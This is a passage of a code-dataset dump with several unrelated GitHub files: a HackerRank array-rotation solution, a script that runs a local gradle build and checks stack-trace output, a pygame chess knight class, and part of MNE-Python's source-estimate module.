v)\n","repo_name":"take9999/knock100","sub_path":"dai3syou/No25_28.py","file_name":"No25_28.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25533873016","text":"\"\"\"\nGiven two numbers N and M. N indicates the number of elements in the array\nA[](1-indexed) and M indicates number of queries. You need to perform two types of\nqueries on the array A[].\nYou are given M queries. 
Queries can be of two types, type 1 and type 2.\n * Type 1 queries are represented as 1 i j : Modify the given array by removing\n elements from to and adding them to the front.\n * Type 2 queries are represented as 2 i j : Modify the given array by removing\n elements from to and adding them to the back.\nYour task is to simply print |A[1]-A[N]| of the resulting array after the execution of M\nqueries followed by the resulting array.\nNote While adding at back or front the order of elements is preserved.\nInput Format\n First line consists of two space-separated integers, N and M.\n Second line contains N integers, which represent the elements of the array.\n M queries follow. Each line contains a query of either type 1 or type 2 in the form\n type i j\nConstraints\n 1<=N,M<=10^5\n 1<=A[i]<=10^9\n 1<=i<=j<=N\nOutput Format\n Print the absolute value i.e. abs(A[1]-A[N]) in the first line.\n Print elements of the resulting array in the second line. Each element should be\n seperated by a single space.\nSample Input\n 8 4\n 1 2 3 4 5 6 7 8\n 1 2 4\n 2 3 5\n 1 4 7\n 2 1 4\nSample Output\n 1\n 2 3 6 5 7 8 4 1\nExplanation\n Given array is {1,2,3,4,5,6,7,8}.\n After execution of query 124, the array becomes {2,3,4,1,6,7,8}.\n After execution of query 235, the array becomes{2,3,6,7,8,4,1,5} .\n After execution of query 147, the array becomes {7,8,4,1,2,3,6,5}.\n After execution of query 214, the array becomes {2,3,6,5,7,8,4,1}.\n Now |A[1]-A[N]| is |(2-1)| i.e. 1 and the array is 23657841\n\"\"\"\n\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT\nfrom array import array\n\nn, n_queries = map(int, input().split())\ndata = array('L', map(int, input().split()))\nassert len(data) == n\nfor m in range(n_queries):\n t, i, j = map(int, input().split())\n if t == 1:\n aux1 = i - 1\n aux2 = j - aux1\n data[:aux2], data[aux2:j] = data[aux1:j], data[:aux1]\n else:\n aux1 = i - 1\n aux2 = aux1 + n - j\n data[aux1:aux2], data[aux2:] = data[j:], data[aux1:j]\nprint(abs(data[0] - data[-1]))\nprint(*data)\n","repo_name":"DanielTLouis/HackerRank","sub_path":"DataStructures/Prepare_DataStructures_BalancedTrees_ArrayAndSimplequeries.py","file_name":"Prepare_DataStructures_BalancedTrees_ArrayAndSimplequeries.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74815934439","text":"import xml.dom.minidom\n\nimport os\n\n\ndef main():\n doc = xml.dom.minidom.parse(\"path/file.xml\");\n print(doc.nodeName)\n print(doc.firstChild.tagName)\n expertise = doc.getElementsByTagName(\"Stacktrace\")\n\n print(len(expertise))\n for skill in expertise:\n print(skill.getAttribute(\"amount\"))\n\ndef files(path):\n for file in os.listdir(path):\n if os.path.isfile(os.path.join(path, file)):\n yield file\n\nif __name__ == \"__main__\":\n # main()\n\n import os\n wd = os.getcwd()\n exe_dir = \"path\"\n os.chdir(exe_dir)\n\n # put everything in demo/ and loop everything in the demo dir\n # file_lst = []\n # for subdir, dirs, files in os.walk(target_dir + 'demo/'):\n # for filename in files:\n # if filename.endswith('gradle'):\n # continue\n # # filepath = subdir + os.sep + filename\n # file_lst.append(filename)\n\n target_dir = 'path'\n file_lst = files(target_dir)\n\n for file in file_lst:\n if file.endswith('gradle'):\n continue\n # a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run -s --args='demo/%s'\" % file).read()\n a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run -s --args='%s/%s'\" % (target_dir, 
file)).read()\n for line in a.split('\\n'):\n if 'Stack' in line:\n if int(line[0]) > 0:\n print('True')\n else:\n print('False')\n\n\n # a = os.popen(\"/opt/gradle/gradle-6.1/bin/gradle run --args='demo/demo.txt'\").read()\n print('----------')\n # print(a)\n os.chdir(wd)\n\n # works for gradle\n # os.system(\"/opt/gradle/gradle-6.1/bin/gradle run --args='demo/demo.txt'\")\n\n # doesn't work for gradle\n # subprocess.Popen(\"/opt/gradle/gradle-6.1/bin/gradle run\")\n # subprocess.Popen(\"gradle run --args='demo/demo.txt'\")\n # subprocess.Popen(\"ls\")\n\n # doesn't work for gradle\n # proc = subprocess.Popen([\"/opt/gradle/gradle-6.1/bin/gradle\", \"run\", \"--args='demo/demo.txt\"],\n # stdout=subprocess.PIPE, shell=True)\n # (out, err) = proc.communicate()\n # print(\"program output:\", out)\n","repo_name":"FalconLK/DigBug-Dig-into-Bug","sub_path":"infozilla.py","file_name":"infozilla.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31536048563","text":"from typing import List, Tuple\nimport pygame\n\nfrom Pieces.ChessPiece import ChessPiece\nfrom Utils.Colours import Colour\n\n\nclass Horse(ChessPiece):\n def __init__(self, screen: pygame.Surface, colour: Colour, pos: Tuple[int, int], board: List[List[ChessPiece]]):\n super().__init__(screen, colour, pos, board)\n\n @property\n def validMoves(self) -> List[Tuple[int, int]]:\n moves = []\n\n def check(x, y):\n try:\n other = self._board[self.y + y][self.x + x]\n if other is None or other.colour != self.colour:\n moves.append((self.x + x, self.y + y))\n except IndexError:\n pass\n\n check(1, 2)\n check(2, 1)\n check(-1, -2)\n check(-2, -1)\n check(1, -2)\n check(2, -1)\n check(-1, 2)\n check(-2, 1)\n\n return moves\n\n def draw(self, xy: Tuple[int, int], size: int, selected: bool = False):\n if selected:\n pygame.draw.circle(self._screen, Colour.green.value, xy, size)\n else:\n 
pygame.draw.circle(self._screen, self.colour.value, xy, size)\n pygame.draw.circle(self._screen, Colour.gray.value, xy, size, 4) # Outline\n","repo_name":"Jodh/ChessGame","sub_path":"Pieces/Horse.py","file_name":"Horse.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27337464291","text":"# Authors: Alexandre Gramfort \n# Matti Hämäläinen \n# Martin Luessi \n# Mads Jensen \n#\n# License: BSD (3-clause)\n\nimport contextlib\nimport copy\nimport os.path as op\nimport numpy as np\nfrom scipy import linalg, sparse\nfrom scipy.sparse import coo_matrix, block_diag as sparse_block_diag\n\nfrom .cov import Covariance\nfrom .evoked import _get_peak\nfrom .filter import resample\nfrom .fixes import einsum\nfrom .surface import read_surface, _get_ico_surface, mesh_edges\nfrom .source_space import (_ensure_src, _get_morph_src_reordering,\n _ensure_src_subject, SourceSpaces, _get_src_nn)\nfrom .utils import (get_subjects_dir, _check_subject, logger, verbose,\n _time_mask, warn as warn_, copy_function_doc_to_method_doc,\n fill_doc, _check_option, _validate_type, _check_src_normal,\n _check_stc_units, _check_pandas_installed,\n _check_pandas_index_arguments, _convert_times,\n _build_data_frame, _check_time_format, _check_scaling_time)\nfrom .viz import (plot_source_estimates, plot_vector_source_estimates,\n plot_volume_source_estimates)\nfrom .io.base import TimeMixin\nfrom .io.meas_info import Info\nfrom .externals.h5io import read_hdf5, write_hdf5\n\n\ndef _read_stc(filename):\n \"\"\"Aux Function.\"\"\"\n with open(filename, 'rb') as fid:\n buf = fid.read()\n\n stc = dict()\n offset = 0\n num_bytes = 4\n\n # read tmin in ms\n stc['tmin'] = float(np.frombuffer(buf, dtype=\">f4\", count=1,\n offset=offset))\n stc['tmin'] /= 1000.0\n offset += num_bytes\n\n # read sampling rate in ms\n stc['tstep'] = float(np.frombuffer(buf, dtype=\">f4\", count=1,\n offset=offset))\n 
stc['tstep'] /= 1000.0\n offset += num_bytes\n\n # read number of vertices/sources\n vertices_n = int(np.frombuffer(buf, dtype=\">u4\", count=1, offset=offset))\n offset += num_bytes\n\n # read the source vector\n stc['vertices'] = np.frombuffer(buf, dtype=\">u4\", count=vertices_n,\n offset=offset)\n offset += num_bytes * vertices_n\n\n # read the number of timepts\n data_n = int(np.frombuffer(buf, dtype=\">u4\", count=1, offset=offset))\n offset += num_bytes\n\n if (vertices_n and # vertices_n can be 0 (empty stc)\n ((len(buf) // 4 - 4 - vertices_n) % (data_n * vertices_n)) != 0):\n raise ValueError('incorrect stc file size')\n\n # read the data matrix\n stc['data'] = np.frombuffer(buf, dtype=\">f4\", count=vertices_n * data_n,\n offset=offset)\n stc['data'] = stc['data'].reshape([data_n, vertices_n]).T\n\n return stc\n\n\ndef _write_stc(filename, tmin, tstep, vertices, data):\n \"\"\"Write an STC file.\n\n Parameters\n ----------\n filename : string\n The name of the STC file.\n tmin : float\n The first time point of the data in seconds.\n tstep : float\n Time between frames in seconds.\n vertices : array of integers\n Vertex indices (0 based).\n data : 2D array\n The data matrix (nvert * ntime).\n \"\"\"\n fid = open(filename, 'wb')\n\n # write start time in ms\n fid.write(np.array(1000 * tmin, dtype='>f4').tostring())\n # write sampling rate in ms\n fid.write(np.array(1000 * tstep, dtype='>f4').tostring())\n # write number of vertices\n fid.write(np.array(vertices.shape[0], dtype='>u4').tostring())\n # write the vertex indices\n fid.write(np.array(vertices, dtype='>u4').tostring())\n\n # write the number of timepts\n fid.write(np.array(data.shape[1], dtype='>u4').tostring())\n #\n # write the data\n #\n fid.write(np.array(data.T, dtype='>f4').tostring())\n\n # close the file\n fid.close()\n\n\ndef _read_3(fid):\n \"\"\"Read 3 byte integer from file.\"\"\"\n data = np.fromfile(fid, dtype=np.uint8, count=3).astype(np.int32)\n\n out = np.left_shift(data[0], 16) + 
np.left_shift(data[1], 8) + data[2]\n\n return out\n\n\ndef _read_w(filename):\n \"\"\"Read a w file.\n\n w files contain activations or source reconstructions for a single time\n point.\n\n Parameters\n ----------\n filename : string\n The name of the w file.\n\n Returns\n -------\n data: dict\n The w structure. It has the following keys:\n vertices vertex indices (0 based)\n data The data matrix (nvert long)\n \"\"\"\n with open(filename, 'rb', buffering=0) as fid: # buffering=0 for np bug\n # skip first 2 bytes\n fid.read(2)\n\n # read number of vertices/sources (3 byte integer)\n vertices_n = int(_read_3(fid))\n\n vertices = np.zeros((vertices_n), dtype=np.int32)\n data = np.zeros((vertices_n), dtype=np.float32)\n\n # read the vertices and data\n for i in range(vertices_n):\n vertices[i] = _read_3(fid)\n data[i] = np.fromfile(fid, dtype='>f4', count=1)[0]\n\n w = dict()\n w['vertices'] = vertices\n w['data'] = data\n\n return w\n\n\ndef _write_3(fid, val):\n \"\"\"Write 3 byte integer to file.\"\"\"\n f_bytes = np.zeros((3), dtype=np.uint8)\n f_bytes[0] = (val >> 16) & 255\n f_bytes[1] = (val >> 8) & 255\n f_bytes[2] = val & 255\n fid.write(f_bytes.tostring())\n\n\ndef _write_w(filename, vertices, data):\n \"\"\"Write a w file.\n\n w files contain activations or source reconstructions for a single time\n point.\n\n Parameters\n ----------\n filename: string\n The name of the w file.\n vertices: array of int\n Vertex indices (0 based).\n data: 1D array\n The data array (nvert).\n \"\"\"\n assert (len(vertices) == len(data))\n\n fid = open(filename, 'wb')\n\n # write 2 zero bytes\n fid.write(np.zeros((2), dtype=np.uint8).tostring())\n\n # write number of vertices/sources (3 byte integer)\n vertices_n = len(vertices)\n _write_3(fid, vertices_n)\n\n # write the vertices and data\n for i in range(vertices_n):\n _write_3(fid, vertices[i])\n # XXX: without float() endianness is wrong, not sure why\n fid.write(np.array(float(data[i]), dtype='>f4').tostring())\n\n # 
close the file\n fid.close()\n\n\ndef read_source_estimate(fname, subject=None):\n \"\"\"Read a source estimate object.\n\n Parameters\n ----------\n fname : str\n Path to (a) source-estimate file(s).\n subject : str | None\n Name of the subject the source estimate(s) is (are) from.\n It is good practice to set this attribute to avoid combining\n incompatible labels and SourceEstimates (e.g., ones from other\n subjects). Note that due to file specification limitations, the\n subject name isn't saved to or loaded from files written to disk.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate | VolSourceEstimate | MixedSourceEstimate\n The source estimate object loaded from file.\n\n Notes\n -----\n - for volume source estimates, ``fname`` should provide the path to a\n single file named '*-vl.stc` or '*-vol.stc'\n - for surface source estimates, ``fname`` should either provide the\n path to the file corresponding to a single hemisphere ('*-lh.stc',\n '*-rh.stc') or only specify the asterisk part in these patterns. 
In any\n case, the function expects files for both hemisphere with names\n following this pattern.\n - for vector surface source estimates, only HDF5 files are supported.\n - for mixed source estimates, only HDF5 files are supported.\n - for single time point .w files, ``fname`` should follow the same\n pattern as for surface estimates, except that files are named\n '*-lh.w' and '*-rh.w'.\n \"\"\" # noqa: E501\n fname_arg = fname\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n\n # make sure corresponding file(s) can be found\n ftype = None\n if op.exists(fname):\n if fname.endswith('-vl.stc') or fname.endswith('-vol.stc') or \\\n fname.endswith('-vl.w') or fname.endswith('-vol.w'):\n ftype = 'volume'\n elif fname.endswith('.stc'):\n ftype = 'surface'\n if fname.endswith(('-lh.stc', '-rh.stc')):\n fname = fname[:-7]\n else:\n err = (\"Invalid .stc filename: %r; needs to end with \"\n \"hemisphere tag ('...-lh.stc' or '...-rh.stc')\"\n % fname)\n raise IOError(err)\n elif fname.endswith('.w'):\n ftype = 'w'\n if fname.endswith(('-lh.w', '-rh.w')):\n fname = fname[:-5]\n else:\n err = (\"Invalid .w filename: %r; needs to end with \"\n \"hemisphere tag ('...-lh.w' or '...-rh.w')\"\n % fname)\n raise IOError(err)\n elif fname.endswith('.h5'):\n ftype = 'h5'\n fname = fname[:-3]\n else:\n raise RuntimeError('Unknown extension for file %s' % fname_arg)\n\n if ftype != 'volume':\n stc_exist = [op.exists(f)\n for f in [fname + '-rh.stc', fname + '-lh.stc']]\n w_exist = [op.exists(f)\n for f in [fname + '-rh.w', fname + '-lh.w']]\n if all(stc_exist) and ftype != 'w':\n ftype = 'surface'\n elif all(w_exist):\n ftype = 'w'\n elif op.exists(fname + '.h5'):\n ftype = 'h5'\n elif op.exists(fname + '-stc.h5'):\n ftype = 'h5'\n fname += '-stc'\n elif any(stc_exist) or any(w_exist):\n raise IOError(\"Hemisphere missing for %r\" % fname_arg)\n else:\n raise IOError(\"SourceEstimate File(s) not found for: %r\"\n % fname_arg)\n\n # read the files\n if ftype == 
'volume': # volume source space\n if fname.endswith('.stc'):\n kwargs = _read_stc(fname)\n elif fname.endswith('.w'):\n kwargs = _read_w(fname)\n kwargs['data'] = kwargs['data'][:, np.newaxis]\n kwargs['tmin'] = 0.0\n kwargs['tstep'] = 0.0\n else:\n raise IOError('Volume source estimate must end with .stc or .w')\n elif ftype == 'surface': # stc file with surface source spaces\n lh = _read_stc(fname + '-lh.stc')\n rh = _read_stc(fname + '-rh.stc')\n assert lh['tmin'] == rh['tmin']\n assert lh['tstep'] == rh['tstep']\n kwargs = lh.copy()\n kwargs['data'] = np.r_[lh['data'], rh['data']]\n kwargs['vertices'] = [lh['vertices'], rh['vertices']]\n elif ftype == 'w': # w file with surface source spaces\n lh = _read_w(fname + '-lh.w')\n rh = _read_w(fname + '-rh.w')\n kwargs = lh.copy()\n kwargs['data'] = np.atleast_2d(np.r_[lh['data'], rh['data']]).T\n kwargs['vertices'] = [lh['vertices'], rh['vertices']]\n # w files only have a single time point\n kwargs['tmin'] = 0.0\n kwargs['tstep'] = 1.0\n ftype = 'surface'\n elif ftype == 'h5':\n kwargs = read_hdf5(fname + '.h5', title='mnepython')\n ftype = kwargs.pop('src_type', 'surface')\n\n if ftype != 'volume':\n # Make sure the vertices are ordered\n vertices = kwargs['vertices']\n if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):\n sidx = [np.argsort(verts) for verts in vertices]\n vertices = [verts[idx] for verts, idx in zip(vertices, sidx)]\n data = kwargs['data'][np.r_[sidx[0], len(sidx[0]) + sidx[1]]]\n kwargs['vertices'] = vertices\n kwargs['data'] = data\n\n if 'subject' not in kwargs:\n kwargs['subject'] = subject\n if subject is not None and subject != kwargs['subject']:\n raise RuntimeError('provided subject name \"%s\" does not match '\n 'subject name from the file \"%s'\n % (subject, kwargs['subject']))\n\n vector = kwargs['data'].ndim == 3\n if ftype in ('volume', 'discrete'):\n klass = VolVectorSourceEstimate if vector else VolSourceEstimate\n elif ftype == 'mixed':\n if vector:\n # XXX we should 
really support this at some point\n raise NotImplementedError('Vector mixed source estimates not yet '\n 'supported')\n klass = MixedSourceEstimate\n else:\n assert ftype == 'surface'\n klass = VectorSourceEstimate if vector else SourceEstimate\n return klass(**kwargs)\n\n\ndef _get_src_type(src, vertices, warn_text=None):\n src_type = None\n if src is None:\n if warn_text is None:\n warn_(\"src should not be None for a robust guess of stc type.\")\n else:\n warn_(warn_text)\n if isinstance(vertices, list) and len(vertices) == 2:\n src_type = 'surface'\n elif isinstance(vertices, np.ndarray) or isinstance(vertices, list) \\\n and len(vertices) == 1:\n src_type = 'volume'\n elif isinstance(vertices, list) and len(vertices) > 2:\n src_type = 'mixed'\n else:\n src_type = src.kind\n assert src_type in ('surface', 'volume', 'mixed', 'discrete')\n return src_type\n\n\ndef _make_stc(data, vertices, src_type=None, tmin=None, tstep=None,\n subject=None, vector=False, source_nn=None, warn_text=None):\n \"\"\"Generate a surface, vector-surface, volume or mixed source estimate.\"\"\"\n def guess_src_type():\n return _get_src_type(src=None, vertices=vertices, warn_text=warn_text)\n\n src_type = guess_src_type() if src_type is None else src_type\n\n if vector and src_type == 'mixed': # XXX this should be supported someday\n raise NotImplementedError(\n 'Vector source estimates for mixed source spaces are not supported'\n )\n\n if vector and src_type == 'surface' and source_nn is None:\n raise RuntimeError('No source vectors supplied.')\n\n # infer Klass from src_type\n if src_type == 'surface':\n Klass = VectorSourceEstimate if vector else SourceEstimate\n elif src_type in ('volume', 'discrete'):\n Klass = VolVectorSourceEstimate if vector else VolSourceEstimate\n elif src_type == 'mixed':\n Klass = MixedSourceEstimate\n else:\n raise ValueError('vertices has to be either a list with one or more '\n 'arrays or an array')\n\n # massage the data\n if src_type == 'surface' and 
vector:\n n_vertices = len(vertices[0]) + len(vertices[1])\n data = np.matmul(\n np.transpose(source_nn.reshape(n_vertices, 3, 3), axes=[0, 2, 1]),\n data.reshape(n_vertices, 3, -1)\n )\n elif src_type in ('volume', 'discrete') and vector:\n data = data.reshape((-1, 3, data.shape[-1]))\n else:\n pass # noqa\n\n return Klass(\n data=data, vertices=vertices, tmin=tmin, tstep=tstep, subject=subject\n )\n\n\ndef _verify_source_estimate_compat(a, b):\n \"\"\"Make sure two SourceEstimates are compatible for arith. operations.\"\"\"\n compat = False\n if type(a) != type(b):\n raise ValueError('Cannot combine %s and %s.' % (type(a), type(b)))\n if len(a.vertices) == len(b.vertices):\n if all(np.array_equal(av, vv)\n for av, vv in zip(a.vertices, b.vertices)):\n compat = True\n if not compat:\n raise ValueError('Cannot combine source estimates that do not have '\n 'the same vertices. Consider using stc.expand().')\n if a.subject != b.subject:\n raise ValueError('source estimates do not have the same subject '\n 'names, %r and %r' % (a.subject, b.subject))\n\n\nclass _BaseSourceEstimate(TimeMixin):\n \"\"\"Base class for all source estimates.\n\n Parameters\n ----------\n data : array, shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : array | list of array\n Vertex numbers corresponding to the data.\n tmin : float\n Time point of the first sample in data.\n tstep : float\n Time step between successive samples in data.\n subject : str | None\n The subject name. 
While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array, shape (n_times,)\n The time vector.\n vertices : array | list of array of shape (n_dipoles,)\n The indices of the dipoles in the different source spaces. Can\n be an array if there is only one source space (e.g., for volumes).\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n \"\"\"\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n assert hasattr(self, '_data_ndim'), self.__class__.__name__\n assert hasattr(self, '_src_type'), self.__class__.__name__\n kernel, sens_data = None, None\n if isinstance(data, tuple):\n if len(data) != 2:\n raise ValueError('If data is a tuple it has to be length 2')\n kernel, sens_data = data\n data = None\n if kernel.shape[1] != sens_data.shape[0]:\n raise ValueError('kernel (%s) and sens_data (%s) have invalid '\n 'dimensions'\n % (kernel.shape, sens_data.shape))\n if sens_data.ndim != 2:\n raise ValueError('The sensor data must have 2 dimensions, got '\n '%s' % (sens_data.ndim,))\n\n if isinstance(vertices, list):\n vertices = [np.asarray(v, int) for v in vertices]\n if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):\n raise ValueError('Vertices must be ordered in increasing '\n 'order.')\n\n n_src = sum([len(v) for v in vertices])\n\n if len(vertices) == 1:\n vertices = vertices[0]\n elif isinstance(vertices, np.ndarray):\n n_src = len(vertices)\n else:\n raise ValueError('Vertices must be a list or numpy array')\n\n # safeguard the user against doing something silly\n if data is not None:\n if data.shape[0] != n_src:\n raise ValueError('Number of vertices (%i) and stc.shape[0] '\n '(%i) must match' % (n_src, data.shape[0]))\n if data.ndim == self._data_ndim 
- 1: # allow upbroadcasting\n data = data[..., np.newaxis]\n if data.ndim != self._data_ndim:\n raise ValueError('Data (shape %s) must have %s dimensions for '\n '%s' % (data.shape, self._data_ndim,\n self.__class__.__name__))\n\n self._data = data\n self._tmin = tmin\n self._tstep = tstep\n self.vertices = vertices\n self.verbose = verbose\n self._kernel = kernel\n self._sens_data = sens_data\n self._kernel_removed = False\n self._times = None\n self._update_times()\n self.subject = _check_subject(None, subject, False)\n\n def __repr__(self): # noqa: D105\n s = \"%d vertices\" % (sum(len(v) for v in self._vertices_list),)\n if self.subject is not None:\n s += \", subject : %s\" % self.subject\n s += \", tmin : %s (ms)\" % (1e3 * self.tmin)\n s += \", tmax : %s (ms)\" % (1e3 * self.times[-1])\n s += \", tstep : %s (ms)\" % (1e3 * self.tstep)\n s += \", data shape : %s\" % (self.shape,)\n return \"<%s | %s>\" % (type(self).__name__, s)\n\n @property\n def _vertices_list(self):\n return self.vertices\n\n @verbose\n def save(self, fname, ftype='h5', verbose=None):\n \"\"\"Save the full source estimate to an HDF5 file.\n\n Parameters\n ----------\n fname : str\n The file name to write the source estimate to, should end in\n '-stc.h5'.\n ftype : str\n File format to use. Currently, the only allowed values is \"h5\".\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n if ftype != 'h5':\n raise ValueError('%s objects can only be written as HDF5 files.'\n % (self.__class__.__name__,))\n if not fname.endswith('.h5'):\n fname += '-stc.h5'\n write_hdf5(fname,\n dict(vertices=self.vertices, data=self.data, tmin=self.tmin,\n tstep=self.tstep, subject=self.subject,\n src_type=self._src_type),\n title='mnepython', overwrite=True)\n\n @property\n def sfreq(self):\n \"\"\"Sample rate of the data.\"\"\"\n return 1. 
/ self.tstep\n\n def _remove_kernel_sens_data_(self):\n \"\"\"Remove kernel and sensor space data and compute self._data.\"\"\"\n if self._kernel is not None or self._sens_data is not None:\n self._kernel_removed = True\n self._data = np.dot(self._kernel, self._sens_data)\n self._kernel = None\n self._sens_data = None\n\n @fill_doc\n def crop(self, tmin=None, tmax=None, include_tmax=True):\n \"\"\"Restrict SourceEstimate to a time interval.\n\n Parameters\n ----------\n tmin : float | None\n The first time point in seconds. If None the first present is used.\n tmax : float | None\n The last time point in seconds. If None the last present is used.\n %(include_tmax)s\n\n Returns\n -------\n stc : instance of SourceEstimate\n The cropped source estimate.\n \"\"\"\n mask = _time_mask(self.times, tmin, tmax, sfreq=self.sfreq,\n include_tmax=include_tmax)\n self.tmin = self.times[np.where(mask)[0][0]]\n if self._kernel is not None and self._sens_data is not None:\n self._sens_data = self._sens_data[..., mask]\n else:\n self.data = self.data[..., mask]\n\n return self # return self for chaining methods\n\n @verbose\n def resample(self, sfreq, npad='auto', window='boxcar', n_jobs=1,\n verbose=None):\n \"\"\"Resample data.\n\n Parameters\n ----------\n sfreq : float\n New sample rate to use.\n npad : int | str\n Amount to pad the start and end of the data.\n Can also be \"auto\" to use a padding that will result in\n a power-of-two size (can be much faster).\n window : str | tuple\n Window to use in resampling. See :func:`scipy.signal.resample`.\n %(n_jobs)s\n %(verbose_meth)s\n\n Returns\n -------\n stc : instance of SourceEstimate\n The resampled source estimate.\n\n Notes\n -----\n For some data, it may be more accurate to use npad=0 to reduce\n artifacts. 
This is dataset dependent -- check your data!\n\n Note that the sample rate of the original data is inferred from tstep.\n \"\"\"\n # resampling in sensor instead of source space gives a somewhat\n # different result, so we don't allow it\n self._remove_kernel_sens_data_()\n\n o_sfreq = 1.0 / self.tstep\n data = self.data\n if data.dtype == np.float32:\n data = data.astype(np.float64)\n self.data = resample(data, sfreq, o_sfreq, npad, n_jobs=n_jobs)\n\n # adjust indirectly affected variables\n self.tstep = 1.0 / sfreq\n return self\n\n @property\n def data(self):\n \"\"\"Numpy array of source estimate data.\"\"\"\n if self._data is None:\n # compute the solution the first time the data is accessed and\n # remove the kernel and sensor data\n self._remove_kernel_sens_data_()\n return self._data\n\n @data.setter\n def data(self, value):\n value = np.asarray(value)\n if self._data is not None and value.ndim != self._data.ndim:\n raise ValueError('Data array should have %d dimensions.' %\n self._data.ndim)\n\n # vertices can be a single number, so cast to ndarray\n if isinstance(self.vertices, list):\n n_verts = sum([len(v) for v in self.vertices])\n elif isinstance(self.vertices, np.ndarray):\n n_verts = len(self.vertices)\n else:\n raise ValueError('Vertices must be a list or numpy array')\n\n if value.shape[0] != n_verts:\n raise ValueError('The first dimension of the data array must '\n 'match the number of vertices (%d != %d)' %\n (value.shape[0], n_verts))\n\n self._data = value\n self._update_times()\n\n @property\n def shape(self):\n \"\"\"Shape of the data.\"\"\"\n if self._data is not None:\n return self._data.shape\n return (self._kernel.shape[0], self._sens_data.shape[1])\n\n @property\n def tmin(self):\n \"\"\"The first timestamp.\"\"\"\n return self._tmin\n\n @tmin.setter\n def tmin(self, value):\n self._tmin = float(value)\n self._update_times()\n\n @property\n def tstep(self):\n \"\"\"The change in time between two consecutive samples (1 / 
sfreq).\"\"\"\n return self._tstep\n\n @tstep.setter\n def tstep(self, value):\n if value <= 0:\n raise ValueError('.tstep must be greater than 0.')\n self._tstep = float(value)\n self._update_times()\n\n @property\n def times(self):\n \"\"\"A timestamp for each sample.\"\"\"\n return self._times\n\n @times.setter\n def times(self, value):\n raise ValueError('You cannot write to the .times attribute directly. '\n 'This property automatically updates whenever '\n '.tmin, .tstep or .data changes.')\n\n def _update_times(self):\n \"\"\"Update the times attribute after changing tmin, tmax, or tstep.\"\"\"\n self._times = self.tmin + (self.tstep * np.arange(self.shape[-1]))\n self._times.flags.writeable = False\n\n def __add__(self, a):\n \"\"\"Add source estimates.\"\"\"\n stc = self.copy()\n stc += a\n return stc\n\n def __iadd__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data += a.data\n else:\n self.data += a\n return self\n\n def mean(self):\n \"\"\"Make a summary stc file with mean over time points.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc.\n \"\"\"\n out = self.sum()\n out /= len(self.times)\n return out\n\n def sum(self):\n \"\"\"Make a summary stc file with sum over time points.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc.\n \"\"\"\n data = self.data\n tmax = self.tmin + self.tstep * data.shape[-1]\n tmin = (self.tmin + tmax) / 2.\n tstep = tmax - self.tmin\n sum_stc = self.__class__(self.data.sum(axis=-1, keepdims=True),\n vertices=self.vertices, tmin=tmin,\n tstep=tstep, subject=self.subject)\n return sum_stc\n\n def __sub__(self, a):\n \"\"\"Subtract source estimates.\"\"\"\n stc = self.copy()\n stc -= a\n return stc\n\n def __isub__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n 
_verify_source_estimate_compat(self, a)\n self.data -= a.data\n else:\n self.data -= a\n return self\n\n def __truediv__(self, a): # noqa: D105\n return self.__div__(a)\n\n def __div__(self, a): # noqa: D105\n \"\"\"Divide source estimates.\"\"\"\n stc = self.copy()\n stc /= a\n return stc\n\n def __itruediv__(self, a): # noqa: D105\n return self.__idiv__(a)\n\n def __idiv__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data /= a.data\n else:\n self.data /= a\n return self\n\n def __mul__(self, a):\n \"\"\"Multiply source estimates.\"\"\"\n stc = self.copy()\n stc *= a\n return stc\n\n def __imul__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data *= a.data\n else:\n self.data *= a\n return self\n\n def __pow__(self, a): # noqa: D105\n stc = self.copy()\n stc **= a\n return stc\n\n def __ipow__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n self.data **= a\n return self\n\n def __radd__(self, a): # noqa: D105\n return self + a\n\n def __rsub__(self, a): # noqa: D105\n return self - a\n\n def __rmul__(self, a): # noqa: D105\n return self * a\n\n def __rdiv__(self, a): # noqa: D105\n return self / a\n\n def __neg__(self): # noqa: D105\n \"\"\"Negate the source estimate.\"\"\"\n stc = self.copy()\n stc._remove_kernel_sens_data_()\n stc.data *= -1\n return stc\n\n def __pos__(self): # noqa: D105\n return self\n\n def __abs__(self):\n \"\"\"Compute the absolute value of the data.\n\n Returns\n -------\n stc : instance of _BaseSourceEstimate\n A version of the source estimate, 